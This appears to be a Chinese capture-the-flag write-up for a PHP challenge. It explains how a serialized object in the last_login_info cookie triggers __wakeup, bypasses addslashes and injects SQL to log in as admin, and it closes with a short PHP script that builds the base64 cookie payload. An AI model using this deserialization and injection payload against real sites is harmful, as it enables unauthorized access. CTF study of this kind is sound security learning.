warmup(php反序列化+SQL注入)
-
题目界面
单看题目界面的话推测可能是SQL注入。
-
题解
题目涉及三个附近,主要从index.php和conn.php入手。
-
index.php中有两个功能,一个是检查请求中的Cookie,一个是检查用户提交的用户名和密码。
-
检查Cookie
首先要求Cookie中的变量是一个数组,然后检查其中的ip字段值是否与目标值相等。
-
检查用户名和密码
在这一部分中,服务器对输入的用户名和密码进行了转义处理:
addlashes(),该函数针对的目标是单引号、双引号和nul值。
-
-
conn.php文件主要实现了数据库连接的逻辑
-
检查用户是否为admin,如果是的话显示flag
-
waf,可以看到过滤的非常严格,可以用到的基本只剩下单引号
-
存在一个魔术方法:_wakeup 该方法非常关键。
-
-
漏洞利用的整体思路为,构造Cookie中的序列化字段last_login_info,构成SQL注入。在index.php中调用unserialize方法后会自动调用魔术方法_wakeup,_wakeup实现连接数据库并检查连接的合法性,此时可以绕过index.php中的转义,从而使用单引号实现SQL注入。
需要注意的是,此时会调用两次数据库的连接,在检查用户提交字段的逻辑部分,index.php会调用sql→connect,这部分的输入依然会报错,但是已经不重要了,因为在Cookie的SQL注入已经达到了显示flag的目的。
<?phpclass SQL{public $table = 'users';public $username = "admin' or '1=1";public $password = '123';#此处是为了测试_wakeup调用的时机,可以删掉public function __wakeup(){if (!isset ($this->conn)) {echo "\n";echo "!isset";}else{echo "\n";echo "YES!";} }}$sql = new SQL();$wp = array('ip' => '39.144.137.29','sql' => $sql,);#unserialize (base64_decode ($_COOKIE['last_login_info']));echo serialize($wp);#这一部分是需要设置的Cookie字段echo base64_encode(serialize ($wp));$last_login_info = unserialize (base64_decode (base64_encode(serialize ($wp))));echo "\n";echo $last_login_info['ip']; ?>
-
